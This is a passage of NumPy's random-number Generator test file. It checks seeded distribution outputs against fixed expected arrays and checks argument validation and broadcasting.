test_logistic(self): random = Generator(MT19937(self.seed)) actual = random.logistic(loc=.123456789, scale=2.0, size=(3, 2)) desired = np.array([[-4.338584631510999, 1.890171436749954], [-4.64547787337966 , 2.514545562919217], [ 1.495389489198666, 1.967827627577474]]) assert_array_almost_equal(actual, desired, decimal=15) def test_lognormal(self): random = Generator(MT19937(self.seed)) actual = random.lognormal(mean=.123456789, sigma=2.0, size=(3, 2)) desired = np.array([[ 0.0268252166335, 13.9534486483053], [ 0.1204014788936, 2.2422077497792], [ 4.2484199496128, 12.0093343977523]]) assert_array_almost_equal(actual, desired, decimal=13) def test_lognormal_0(self): assert_equal(random.lognormal(sigma=0), 1) assert_raises(ValueError, random.lognormal, sigma=-0.) def test_logseries(self): random = Generator(MT19937(self.seed)) actual = random.logseries(p=.923456789, size=(3, 2)) desired = np.array([[14, 17], [3, 18], [5, 1]]) assert_array_equal(actual, desired) def test_logseries_exceptions(self): with np.errstate(invalid='ignore'): assert_raises(ValueError, random.logseries, np.nan) assert_raises(ValueError, random.logseries, [np.nan] * 10) def test_multinomial(self): random = Generator(MT19937(self.seed)) actual = random.multinomial(20, [1 / 6.] * 6, size=(3, 2)) desired = np.array([[[1, 5, 1, 6, 4, 3], [4, 2, 6, 2, 4, 2]], [[5, 3, 2, 6, 3, 1], [4, 4, 0, 2, 3, 7]], [[6, 3, 1, 5, 3, 2], [5, 5, 3, 1, 2, 4]]]) assert_array_equal(actual, desired) @pytest.mark.parametrize("method", ["svd", "eigh", "cholesky"]) def test_multivariate_normal(self, method): random = Generator(MT19937(self.seed)) mean = (.123456789, 10) cov = [[1, 0], [0, 1]] size = (3, 2) actual = random.multivariate_normal(mean, cov, size, method=method) desired = np.array([[[-1.747478062846581, 11.25613495182354 ], [-0.9967333370066214, 10.342002097029821 ]], [[ 0.7850019631242964, 11.181113712443013 ], [ 0.8901349653255224, 8.873825399642492 ]], [[ 0.7130260107430003, 9.551628690083056 ], [ 0.7127098726541128, 11.991709234143173 ]]]) assert_array_almost_equal(actual, desired, decimal=15) # Check for default size, was raising deprecation warning actual = random.multivariate_normal(mean, cov, method=method) desired = np.array([0.233278563284287, 9.424140804347195]) assert_array_almost_equal(actual, desired, decimal=15) # Check that non symmetric covariance input raises exception when # check_valid='raises' if using default svd method. mean = [0, 0] cov = [[1, 2], [1, 2]] assert_raises(ValueError, random.multivariate_normal, mean, cov, check_valid='raise') # Check that non positive-semidefinite covariance warns with # RuntimeWarning cov = [[1, 2], [2, 1]] assert_warns(RuntimeWarning, random.multivariate_normal, mean, cov) assert_warns(RuntimeWarning, random.multivariate_normal, mean, cov, method='eigh') assert_raises(LinAlgError, random.multivariate_normal, mean, cov, method='cholesky') # and that it doesn't warn with RuntimeWarning check_valid='ignore' assert_no_warnings(random.multivariate_normal, mean, cov, check_valid='ignore') # and that it raises with RuntimeWarning check_valid='raises' assert_raises(ValueError, random.multivariate_normal, mean, cov, check_valid='raise') assert_raises(ValueError, random.multivariate_normal, mean, cov, check_valid='raise', method='eigh') # check degenerate samples from singular covariance matrix cov = [[1, 1], [1, 1]] if method in ('svd', 'eigh'): samples = random.multivariate_normal(mean, cov, size=(3, 2), method=method) assert_array_almost_equal(samples[..., 0], samples[..., 1], decimal=6) else: assert_raises(LinAlgError, random.multivariate_normal, mean, cov, method='cholesky') cov = np.array([[1, 0.1], [0.1, 1]], dtype=np.float32) with suppress_warnings() as sup: random.multivariate_normal(mean, cov, method=method) w = sup.record(RuntimeWarning) assert len(w) == 0 mu = np.zeros(2) cov = np.eye(2) assert_raises(ValueError, random.multivariate_normal, mean, cov, check_valid='other') assert_raises(ValueError, random.multivariate_normal, np.zeros((2, 1, 1)), cov) assert_raises(ValueError, random.multivariate_normal, mu, np.empty((3, 2))) assert_raises(ValueError, random.multivariate_normal, mu, np.eye(3)) @pytest.mark.parametrize("method", ["svd", "eigh", "cholesky"]) def test_multivariate_normal_basic_stats(self, method): random = Generator(MT19937(self.seed)) n_s = 1000 mean = np.array([1, 2]) cov = np.array([[2, 1], [1, 2]]) s = random.multivariate_normal(mean, cov, size=(n_s,), method=method) s_center = s - mean cov_emp = (s_center.T @ s_center) / (n_s - 1) # these are pretty loose and are only designed to detect major errors assert np.all(np.abs(s_center.mean(-2)) < 0.1) assert np.all(np.abs(cov_emp - cov) < 0.2) def test_negative_binomial(self): random = Generator(MT19937(self.seed)) actual = random.negative_binomial(n=100, p=.12345, size=(3, 2)) desired = np.array([[543, 727], [775, 760], [600, 674]]) assert_array_equal(actual, desired) def test_negative_binomial_exceptions(self): with np.errstate(invalid='ignore'): assert_raises(ValueError, random.negative_binomial, 100, np.nan) assert_raises(ValueError, random.negative_binomial, 100, [np.nan] * 10) def test_negative_binomial_p0_exception(self): # Verify that p=0 raises an exception. with assert_raises(ValueError): x = random.negative_binomial(1, 0) def test_noncentral_chisquare(self): random = Generator(MT19937(self.seed)) actual = random.noncentral_chisquare(df=5, nonc=5, size=(3, 2)) desired = np.array([[ 1.70561552362133, 15.97378184942111], [13.71483425173724, 20.17859633310629], [11.3615477156643 , 3.67891108738029]]) assert_array_almost_equal(actual, desired, decimal=14) actual = random.noncentral_chisquare(df=.5, nonc=.2, size=(3, 2)) desired = np.array([[9.41427665607629e-04, 1.70473157518850e-04], [1.14554372041263e+00, 1.38187755933435e-03], [1.90659181905387e+00, 1.21772577941822e+00]]) assert_array_almost_equal(actual, desired, decimal=14) random = Generator(MT19937(self.seed)) actual = random.noncentral_chisquare(df=5, nonc=0, size=(3, 2)) desired = np.array([[0.82947954590419, 1.80139670767078], [6.58720057417794, 7.00491463609814], [6.31101879073157, 6.30982307753005]]) assert_array_almost_equal(actual, desired, decimal=14) def test_noncentral_f(self): random = Generator(MT19937(self.seed)) actual = random.noncentral_f(dfnum=5, dfden=2, nonc=1, size=(3, 2)) desired = np.array([[0.060310671139 , 0.23866058175939], [0.86860246709073, 0.2668510459738 ], [0.23375780078364, 1.88922102885943]]) assert_array_almost_equal(actual, desired, decimal=14) def test_noncentral_f_nan(self): random = Generator(MT19937(self.seed)) actual = random.noncentral_f(dfnum=5, dfden=2, nonc=np.nan) assert np.isnan(actual) def test_normal(self): random = Generator(MT19937(self.seed)) actual = random.normal(loc=.123456789, scale=2.0, size=(3, 2)) desired = np.array([[-3.618412914693162, 2.635726692647081], [-2.116923463013243, 0.807460983059643], [ 1.446547137248593, 2.485684213886024]]) assert_array_almost_equal(actual, desired, decimal=15) def test_normal_0(self): assert_equal(random.normal(scale=0), 0) assert_raises(ValueError, random.normal, scale=-0.) def test_pareto(self): random = Generator(MT19937(self.seed)) actual = random.pareto(a=.123456789, size=(3, 2)) desired = np.array([[1.0394926776069018e+00, 7.7142534343505773e+04], [7.2640150889064703e-01, 3.4650454783825594e+05], [4.5852344481994740e+04, 6.5851383009539105e+07]]) # For some reason on 32-bit x86 Ubuntu 12.10 the [1, 0] entry in this # matrix differs by 24 nulps. Discussion: # https://mail.python.org/pipermail/numpy-discussion/2012-September/063801.html # Consensus is that this is probably some gcc quirk that affects # rounding but not in any important way, so we just use a looser # tolerance on this test: np.testing.assert_array_almost_equal_nulp(actual, desired, nulp=30) def test_poisson(self): random = Generator(MT19937(self.seed)) actual = random.poisson(lam=.123456789, size=(3, 2)) desired = np.array([[0, 0], [0, 0], [0, 0]]) assert_array_equal(actual, desired) def test_poisson_exceptions(self): lambig = np.iinfo('int64').max lamneg = -1 assert_raises(ValueError, random.poisson, lamneg) assert_raises(ValueError, random.poisson, [lamneg] * 10) assert_raises(ValueError, random.poisson, lambig) assert_raises(ValueError, random.poisson, [lambig] * 10) with np.errstate(invalid='ignore'): assert_raises(ValueError, random.poisson, np.nan) assert_raises(ValueError, random.poisson, [np.nan] * 10) def test_power(self): random = Generator(MT19937(self.seed)) actual = random.power(a=.123456789, size=(3, 2)) desired = np.array([[1.977857368842754e-09, 9.806792196620341e-02], [2.482442984543471e-10, 1.527108843266079e-01], [8.188283434244285e-02, 3.950547209346948e-01]]) assert_array_almost_equal(actual, desired, decimal=15) def test_rayleigh(self): random = Generator(MT19937(self.seed)) actual = random.rayleigh(scale=10, size=(3, 2)) desired = np.array([[ 4.51734079831581, 15.6802442485758 ], [ 4.19850651287094, 17.08718809823704], [14.7907457708776 , 15.85545333419775]]) assert_array_almost_equal(actual, desired, decimal=14) def test_rayleigh_0(self): assert_equal(random.rayleigh(scale=0), 0) assert_raises(ValueError, random.rayleigh, scale=-0.) def test_standard_cauchy(self): random = Generator(MT19937(self.seed)) actual = random.standard_cauchy(size=(3, 2)) desired = np.array([[-1.489437778266206, -3.275389641569784], [ 0.560102864910406, -0.680780916282552], [-1.314912905226277, 0.295852965660225]]) assert_array_almost_equal(actual, desired, decimal=15) def test_standard_exponential(self): random = Generator(MT19937(self.seed)) actual = random.standard_exponential(size=(3, 2), method='inv') desired = np.array([[0.102031839440643, 1.229350298474972], [0.088137284693098, 1.459859985522667], [1.093830802293668, 1.256977002164613]]) assert_array_almost_equal(actual, desired, decimal=15) def test_standard_expoential_type_error(self): assert_raises(TypeError, random.standard_exponential, dtype=np.int32) def test_standard_gamma(self): random = Generator(MT19937(self.seed)) actual = random.standard_gamma(shape=3, size=(3, 2)) desired = np.array([[0.62970724056362, 1.22379851271008], [3.899412530884 , 4.12479964250139], [3.74994102464584, 3.74929307690815]]) assert_array_almost_equal(actual, desired, decimal=14) def test_standard_gammma_scalar_float(self): random = Generator(MT19937(self.seed)) actual = random.standard_gamma(3, dtype=np.float32) desired = 2.9242148399353027 assert_array_almost_equal(actual, desired, decimal=6) def test_standard_gamma_float(self): random = Generator(MT19937(self.seed)) actual = random.standard_gamma(shape=3, size=(3, 2)) desired = np.array([[0.62971, 1.2238 ], [3.89941, 4.1248 ], [3.74994, 3.74929]]) assert_array_almost_equal(actual, desired, decimal=5) def test_standard_gammma_float_out(self): actual = np.zeros((3, 2), dtype=np.float32) random = Generator(MT19937(self.seed)) random.standard_gamma(10.0, out=actual, dtype=np.float32) desired = np.array([[10.14987, 7.87012], [ 9.46284, 12.56832], [13.82495, 7.81533]], dtype=np.float32) assert_array_almost_equal(actual, desired, decimal=5) random = Generator(MT19937(self.seed)) random.standard_gamma(10.0, out=actual, size=(3, 2), dtype=np.float32) assert_array_almost_equal(actual, desired, decimal=5) def test_standard_gamma_unknown_type(self): assert_raises(TypeError, random.standard_gamma, 1., dtype='int32') def test_out_size_mismatch(self): out = np.zeros(10) assert_raises(ValueError, random.standard_gamma, 10.0, size=20, out=out) assert_raises(ValueError, random.standard_gamma, 10.0, size=(10, 1), out=out) def test_standard_gamma_0(self): assert_equal(random.standard_gamma(shape=0), 0) assert_raises(ValueError, random.standard_gamma, shape=-0.) def test_standard_normal(self): random = Generator(MT19937(self.seed)) actual = random.standard_normal(size=(3, 2)) desired = np.array([[-1.870934851846581, 1.25613495182354 ], [-1.120190126006621, 0.342002097029821], [ 0.661545174124296, 1.181113712443012]]) assert_array_almost_equal(actual, desired, decimal=15) def test_standard_normal_unsupported_type(self): assert_raises(TypeError, random.standard_normal, dtype=np.int32) def test_standard_t(self): random = Generator(MT19937(self.seed)) actual = random.standard_t(df=10, size=(3, 2)) desired = np.array([[-1.484666193042647, 0.30597891831161 ], [ 1.056684299648085, -0.407312602088507], [ 0.130704414281157, -2.038053410490321]]) assert_array_almost_equal(actual, desired, decimal=15) def test_triangular(self): random = Generator(MT19937(self.seed)) actual = random.triangular(left=5.12, mode=10.23, right=20.34, size=(3, 2)) desired = np.array([[ 7.86664070590917, 13.6313848513185 ], [ 7.68152445215983, 14.36169131136546], [13.16105603911429, 13.72341621856971]]) assert_array_almost_equal(actual, desired, decimal=14) def test_uniform(self): random = Generator(MT19937(self.seed)) actual = random.uniform(low=1.23, high=10.54, size=(3, 2)) desired = np.array([[2.13306255040998 , 7.816987531021207], [2.015436610109887, 8.377577533009589], [7.421792588856135, 7.891185744455209]]) assert_array_almost_equal(actual, desired, decimal=15) def test_uniform_range_bounds(self): fmin = np.finfo('float').min fmax = np.finfo('float').max func = random.uniform assert_raises(OverflowError, func, -np.inf, 0) assert_raises(OverflowError, func, 0, np.inf) assert_raises(OverflowError, func, fmin, fmax) assert_raises(OverflowError, func, [-np.inf], [0]) assert_raises(OverflowError, func, [0], [np.inf]) # (fmax / 1e17) - fmin is within range, so this should not throw # account for i386 extended precision DBL_MAX / 1e17 + DBL_MAX > # DBL_MAX by increasing fmin a bit random.uniform(low=np.nextafter(fmin, 1), high=fmax / 1e17) def test_scalar_exception_propagation(self): # Tests that exceptions are correctly propagated in distributions # when called with objects that throw exceptions when converted to # scalars. # # Regression test for gh: 8865 class ThrowingFloat(np.ndarray): def __float__(self): raise TypeError throwing_float = np.array(1.0).view(ThrowingFloat) assert_raises(TypeError, random.uniform, throwing_float, throwing_float) class ThrowingInteger(np.ndarray): def __int__(self): raise TypeError throwing_int = np.array(1).view(ThrowingInteger) assert_raises(TypeError, random.hypergeometric, throwing_int, 1, 1) def test_vonmises(self): random = Generator(MT19937(self.seed)) actual = random.vonmises(mu=1.23, kappa=1.54, size=(3, 2)) desired = np.array([[ 1.107972248690106, 2.841536476232361], [ 1.832602376042457, 1.945511926976032], [-0.260147475776542, 2.058047492231698]]) assert_array_almost_equal(actual, desired, decimal=15) def test_vonmises_small(self): # check infinite loop, gh-4720 random = Generator(MT19937(self.seed)) r = random.vonmises(mu=0., kappa=1.1e-8, size=10**6) assert_(np.isfinite(r).all()) def test_vonmises_nan(self): random = Generator(MT19937(self.seed)) r = random.vonmises(mu=0., kappa=np.nan) assert_(np.isnan(r)) def test_wald(self): random = Generator(MT19937(self.seed)) actual = random.wald(mean=1.23, scale=1.54, size=(3, 2)) desired = np.array([[0.26871721804551, 3.2233942732115 ], [2.20328374987066, 2.40958405189353], [2.07093587449261, 0.73073890064369]]) assert_array_almost_equal(actual, desired, decimal=14) def test_weibull(self): random = Generator(MT19937(self.seed)) actual = random.weibull(a=1.23, size=(3, 2)) desired = np.array([[0.138613914769468, 1.306463419753191], [0.111623365934763, 1.446570494646721], [1.257145775276011, 1.914247725027957]]) assert_array_almost_equal(actual, desired, decimal=15) def test_weibull_0(self): random = Generator(MT19937(self.seed)) assert_equal(random.weibull(a=0, size=12), np.zeros(12)) assert_raises(ValueError, random.weibull, a=-0.) def test_zipf(self): random = Generator(MT19937(self.seed)) actual = random.zipf(a=1.23, size=(3, 2)) desired = np.array([[ 1, 1], [ 10, 867], [354, 2]]) assert_array_equal(actual, desired) class TestBroadcast: # tests that functions that broadcast behave # correctly when presented with non-scalar arguments def setup(self): self.seed = 123456789 def test_uniform(self): random = Generator(MT19937(self.seed)) low = [0] high = [1] uniform = random.uniform desired = np.array([0.16693771389729, 0.19635129550675, 0.75563050964095]) random = Generator(MT19937(self.seed)) actual = random.uniform(low * 3, high) assert_array_almost_equal(actual, desired, decimal=14) random = Generator(MT19937(self.seed)) actual = random.uniform(low, high * 3) assert_array_almost_equal(actual, desired, decimal=14) def test_normal(self): loc = [0] scale = [1] bad_scale = [-1] random = Generator(MT19937(self.seed)) desired = np.array([-0.38736406738527, 0.79594375042255, 0.0197076236097]) random = Generator(MT19937(self.seed)) actual = random.normal(loc * 3, scale) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, random.normal, loc * 3, bad_scale) random = Generator(MT19937(self.seed)) normal = random.normal actual = normal(loc, scale * 3) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, normal, loc, bad_scale * 3) def test_beta(self): a = [1] b = [2] bad_a = [-1] bad_b = [-2] desired = np.array([0.18719338682602, 0.73234824491364, 0.17928615186455]) random = Generator(MT19937(self.seed)) beta = random.beta actual = beta(a * 3, b) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, beta, bad_a * 3, b) assert_raises(ValueError, beta, a * 3, bad_b) random = Generator(MT19937(self.seed)) actual = random.beta(a, b * 3) assert_array_almost_equal(actual, desired, decimal=14) def test_exponential(self): scale = [1] bad_scale = [-1] desired = np.array([0.67245993212806, 0.21380495318094, 0.7177848928629]) random = Generator(MT19937(self.seed)) actual = random.exponential(scale * 3) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, random.exponential, bad_scale * 3) def test_standard_gamma(self): shape = [1] bad_shape = [-1] desired = np.array([0.67245993212806, 0.21380495318094, 0.7177848928629]) random = Generator(MT19937(self.seed)) std_gamma = random.standard_gamma actual = std_gamma(shape * 3) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, std_gamma, bad_shape * 3) def test_gamma(self): shape = [1] scale = [2] bad_shape = [-1] bad_scale = [-2] desired = np.array([1.34491986425611, 0.42760990636187, 1.4355697857258]) random = Generator(MT19937(self.seed)) gamma = random.gamma actual = gamma(shape * 3, scale) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, gamma, bad_shape * 3, scale) assert_raises(ValueError, gamma, shape * 3, bad_scale) random = Generator(MT19937(self.seed)) gamma = random.gamma actual = gamma(shape, scale * 3) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, gamma, bad_shape, scale * 3) assert_raises(ValueError, gamma, shape, bad_scale * 3) def test_f(self): dfnum = [1] dfden = [2] bad_dfnum = [-1] bad_dfden = [-2] desired = np.array([0.07765056244107, 7.72951397913186, 0.05786093891763]) random = Generator(MT19937(self.seed)) f = random.f actual = f(dfnum * 3, dfden) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, f, bad_dfnum * 3, dfden) assert_raises(ValueError, f, dfnum * 3, bad_dfden) random = Generator(MT19937(self.seed)) f = random.f actual = f(dfnum, dfden * 3) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, f, bad_dfnum, dfden * 3) assert_raises(ValueError, f, dfnum, bad_dfden * 3) def test_noncentral_f(self): dfnum = [2] dfden = [3] nonc = [4] bad_dfnum = [0] bad_dfden = [-1] bad_nonc = [-2] desired = np.array([2.02434240411421, 12.91838601070124, 1.24395160354629]) random = Generator(MT19937(self.seed)) nonc_f = random.noncentral_f actual = nonc_f(dfnum * 3, dfden, nonc) assert_array_almost_equal(actual, desired, decimal=14) assert np.all(np.isnan(nonc_f(dfnum, dfden, [np.nan] * 3))) assert_raises(ValueError, nonc_f, bad_dfnum * 3, dfden, nonc) assert_raises(ValueError, nonc_f, dfnum * 3, bad_dfden, nonc) assert_raises(ValueError, nonc_f, dfnum * 3, dfden, bad_nonc) random = Generator(MT19937(self.seed)) nonc_f = random.noncentral_f actual = nonc_f(dfnum, dfden * 3, nonc) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, nonc_f, bad_dfnum, dfden * 3, nonc) assert_raises(ValueError, nonc_f, dfnum, bad_dfden * 3, nonc) assert_raises(ValueError, nonc_f, dfnum, dfden * 3, bad_nonc) random = Generator(MT19937(self.seed)) nonc_f = random.noncentral_f actual = nonc_f(dfnum, dfden, nonc * 3) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, nonc_f, bad_dfnum, dfden, nonc * 3) assert_raises(ValueError, nonc_f, dfnum, bad_dfden, nonc * 3) assert_raises(ValueError, nonc_f, dfnum, dfden, bad_nonc * 3) def test_noncentral_f_small_df(self): random = Generator(MT19937(self.seed)) desired = np.array([0.04714867120827, 0.1239390327694]) actual = random.noncentral_f(0.9, 0.9, 2, size=2) assert_array_almost_equal(actual, desired, decimal=14) def test_chisquare(self): df = [1] bad_df = [-1] desired = np.array([0.05573640064251, 1.47220224353539, 2.9469379318589]) random = Generator(MT19937(self.seed)) actual = random.chisquare(df * 3) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, random.chisquare, bad_df * 3) def test_noncentral_chisquare(self): df = [1] nonc = [2] bad_df = [-1] bad_nonc = [-2] desired = np.array([0.07710766249436, 5.27829115110304, 0.630732147399]) random = Generator(MT19937(self.seed)) nonc_chi = random.noncentral_chisquare actual = nonc_chi(df * 3, nonc) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, nonc_chi, bad_df * 3, nonc) assert_raises(ValueError, nonc_chi, df * 3, bad_nonc) random = Generator(MT19937(self.seed)) nonc_chi = random.noncentral_chisquare actual = nonc_chi(df, nonc * 3) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, nonc_chi, bad_df, nonc * 3) assert_raises(ValueError, nonc_chi, df, bad_nonc * 3) def test_standard_t(self): df = [1] bad_df = [-1] desired = np.array([-1.39498829447098, -1.23058658835223, 0.17207021065983]) random = Generator(MT19937(self.seed)) actual = random.standard_t(df * 3) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, random.standard_t, bad_df * 3) def test_vonmises(self): mu = [2] kappa = [1] bad_kappa = [-1] desired = np.array([2.25935584988528, 2.23326261461399, -2.84152146503326]) random = Generator(MT19937(self.seed)) actual = random.vonmises(mu * 3, kappa) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, random.vonmises, mu * 3, bad_kappa) random = Generator(MT19937(self.seed)) actual = random.vonmises(mu, kappa * 3) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, random.vonmises, mu, bad_kappa * 3) def test_pareto(self): a = [1] bad_a = [-1] desired = np.array([0.95905052946317, 0.2383810889437 , 1.04988745750013]) random = Generator(MT19937(self.seed)) actual = random.pareto(a * 3) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, random.pareto, bad_a * 3) def test_weibull(self): a = [1] bad_a = [-1] desired = np.array([0.67245993212806, 0.21380495318094, 0.7177848928629]) random = Generator(MT19937(self.seed)) actual = random.weibull(a * 3) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, random.weibull, bad_a * 3) def test_power(self): a = [1] bad_a = [-1] desired = np.array([0.48954864361052, 0.19249412888486, 0.51216834058807]) random = Generator(MT19937(self.seed)) actual = random.power(a * 3) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, random.power, bad_a * 3) def test_laplace(self): loc = [0] scale = [1] bad_scale = [-1] desired = np.array([-1.09698732625119, -0.93470271947368, 0.71592671378202]) random = Generator(MT19937(self.seed)) laplace = random.laplace actual = laplace(loc * 3, scale) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, laplace, loc * 3, bad_scale) random = Generator(MT19937(self.seed)) laplace = random.laplace actual = laplace(loc, scale * 3) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, laplace, loc, bad_scale * 3) def test_gumbel(self): loc = [0] scale = [1] bad_scale = [-1] desired = np.array([1.70020068231762, 1.52054354273631, -0.34293267607081]) random = Generator(MT19937(self.seed)) gumbel = random.gumbel actual = gumbel(loc * 3, scale) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, gumbel, loc * 3, bad_scale) random = Generator(MT19937(self.seed)) gumbel = random.gumbel actual = gumbel(loc, scale * 3) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, gumbel, loc, bad_scale * 3) def test_logistic(self): loc = [0] scale = [1] bad_scale = [-1] desired = np.array([-1.607487640433, -1.40925686003678, 1.12887112820397]) random = Generator(MT19937(self.seed)) actual = random.logistic(loc * 3, scale) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, random.logistic, loc * 3, bad_scale) random = Generator(MT19937(self.seed)) actual = random.logistic(loc, scale * 3) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, random.logistic, loc, bad_scale * 3) assert_equal(random.logistic(1.0, 0.0), 1.0) def test_lognormal(self): mean = [0] sigma = [1] bad_sigma = [-1] desired = np.array([0.67884390500697, 2.21653186290321, 1.01990310084276]) random = Generator(MT19937(self.seed)) lognormal = random.lognormal actual = lognormal(mean * 3, sigma) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, lognormal, mean * 3, bad_sigma) random = Generator(MT19937(self.seed)) actual = random.lognormal(mean, sigma * 3) assert_raises(ValueError, random.lognormal, mean, bad_sigma * 3) def test_rayleigh(self): scale = [1] bad_scale = [-1] desired = np.array([0.60439534475066, 0.66120048396359, 1.67873398389499]) random = Generator(MT19937(self.seed)) actual = random.rayleigh(scale * 3) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, random.rayleigh, bad_scale * 3) def test_wald(self): mean = [0.5] scale = [1] bad_mean = [0] bad_scale = [-2] desired = np.array([0.38052407392905, 0.50701641508592, 0.484935249864]) random = Generator(MT19937(self.seed)) actual = random.wald(mean * 3, scale) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, random.wald, bad_mean * 3, scale) assert_raises(ValueError, random.wald, mean * 3, bad_scale) random = Generator(MT19937(self.seed)) actual = random.wald(mean, scale * 3) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, random.wald, bad_mean, scale * 3) assert_raises(ValueError, random.wald, mean, bad_scale * 3) def test_triangular(self): left = [1] right = [3] mode = [2] bad_left_one = [3] bad_mode_one = [4] bad_left_two, bad_mode_two = right * 2 desired = np.array([1.57781954604754, 1.62665986867957, 2.30090130831326]) random = Generator(MT19937(self.seed)) triangular = random.triangular actual = triangular(left * 3, mode, right) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, triangular, bad_left_one * 3, mode, right) assert_raises(ValueError, triangular, left * 3, bad_mode_one, right) assert_raises(ValueError, triangular, bad_left_two * 3, bad_mode_two, right) random = Generator(MT19937(self.seed)) triangular = random.triangular actual = triangular(left, mode * 3, right) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, triangular, bad_left_one, mode * 3, right) assert_raises(ValueError, triangular, left, bad_mode_one * 3, right) assert_raises(ValueError, triangular, bad_left_two, bad_mode_two * 3, right) random = Generator(MT19937(self.seed)) triangular = random.triangular actual = triangular(left, mode, right * 3) assert_array_almost_equal(actual, desired, decimal=14) assert_raises(ValueError, triangular, bad_left_one, mode, right * 3) assert_raises(ValueError, triangular, left, bad_mode_one, right * 3) assert_raises(ValueError, triangular, bad_left_two, bad_mode_two, right * 3) assert_raises(ValueError, triangular, 10., 0., 20.) assert_raises(ValueError, triangular, 10., 25., 20.) assert_raises(ValueError, triangular, 10., 10., 10.) def test_binomial(self): n = [1] p = [0.5] bad_n = [-1] bad_p_one = [-1] bad_p_two = [1.5] desired = np.array([0, 0, 1]) random = Generator(MT19937(self.seed)) binom = random.binomial actual = binom(n * 3, p) assert_array_equal(actual, desired) assert_raises(ValueError, binom, bad_n * 3, p) assert_raises(ValueError, binom, n * 3, bad_p_one) assert_raises(ValueError, binom, n * 3, bad_p_two) random = Generator(MT19937(self.seed)) actual = random.binomial(n, p * 3) assert_array_equal(actual, desired) assert_raises(ValueError, binom, bad_n, p * 3) assert_raises(ValueError, binom, n, bad_p_one * 3) assert_raises(ValueError, binom, n, bad_p_two * 3) def test_negative_binomial(self): n = [1] p = [0.5] bad_n = [-1] bad_p_one = [-1] bad_p_two = [1.5] desired = np.array([0, 2, 1], dtype=np.int64) random = Generator(MT19937(self.seed)) neg_binom = random.negative_binomial actual = neg_binom(n * 3, p) assert_array_equal(actual, desired) assert_raises(ValueError, neg_binom, bad_n * 3, p) assert_raises(ValueError, neg_binom, n * 3, bad_p_one) assert_raises(ValueError, neg_binom, n * 3, bad_p_two) random = Generator(MT19937(self.seed)) neg_binom = random.negative_binomial actual = neg_binom(n, p * 3) assert_array_equal(actual, desired) assert_raises(ValueError, neg_binom, bad_n, p * 3) assert_raises(ValueError, neg_binom, n, bad_p_one * 3) assert_raises(ValueError, neg_binom, n, bad_p_two * 3) def test_poisson(self): lam = [1] bad_lam_one = [-1] desired = np.array([0, 0, 3]) random = Generator(MT19937(self.seed)) max_lam = random._poisson_lam_max bad_lam_two = [max_lam * 2] poisson = random.poisson actual = poisson(lam * 3) assert_array_equal(actual, desired) assert_raises(ValueError, poisson, bad_lam_one * 3) assert_raises(ValueError, poisson, bad_lam_two * 3) def test_zipf(self): a = [2] bad_a = [0] desired = np.array([1, 8, 1]) random = Generator(MT19937(self.seed)) zipf = random.zipf actual = zipf(a * 3) assert_array_equal(actual, desired) assert_raises(ValueError, zipf, bad_a * 3) with np.errstate(invalid='ignore'): assert_raises(ValueError, zipf, np.nan) assert_raises(ValueError, zipf, [0, 0, np.nan]) def test_geometric(self): p = [0.5] bad_p_one = [-1] bad_p_two = [1.5] desired = np.array([1, 1, 3]) random = Generator(MT19937(self.seed)) geometric = random.geometric actual = geometric(p * 3) assert_array_equal(actual, desired) assert_raises(ValueError, geometric, bad_p_one * 3) assert_raises(ValueError, geometric, bad_p_two * 3) def test_hypergeometric(self): ngood = [1] nbad = [2] nsample = [2] bad_ngood = [-1] bad_nbad = [-2] bad_nsample_one = [-1] bad_nsample_two = [4] desired = np.array([0, 0, 1]) random = Generator(MT19937(self.seed)) actual = random.hypergeometric(ngood * 3, nbad, nsample) assert_array_equal(actual, desired) assert_raises(ValueError, random.hypergeometric, bad_ngood * 3, nbad, nsample) assert_raises(ValueError, random.hypergeometric, ngood * 3, bad_nbad, nsample) assert_raises(ValueError, random.hypergeometric, ngood * 3, nbad, bad_nsample_one) assert_raises(ValueError, random.hypergeometric, ngood * 3, nbad, bad_nsample_two) random = Generator(MT19937(self.seed)) actual = random.hypergeometric(ngood, nbad * 3, nsample) assert_array_equal(actual, desired) assert_raises(ValueError, random.hypergeometric, bad_ngood, nbad * 3, nsample) assert_raises(ValueError, random.hypergeometric, ngood, bad_nbad * 3, nsample) assert_raises(ValueError, random.hypergeometric, ngood, nbad * 3, bad_nsample_one) assert_raises(ValueError, random.hypergeometric, ngood, nbad * 3, bad_nsample_two) random = Generator(MT19937(self.seed)) hypergeom = random.hypergeometric actual = hypergeom(ngood, nbad, nsample * 3) assert_array_equal(actual, desired) assert_raises(ValueError, hypergeom, bad_ngood, nbad, nsample * 3) assert_raises(ValueError, 